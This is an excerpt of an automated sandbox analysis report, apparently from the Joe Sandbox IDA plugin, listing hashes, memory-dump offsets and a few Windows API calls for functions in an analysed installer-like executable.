                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                • String ID: Error launching installer
                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                                • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2717439681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2717415511.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717457516.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717475134.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2717499670.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 190613189-0
                                                                                                                • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98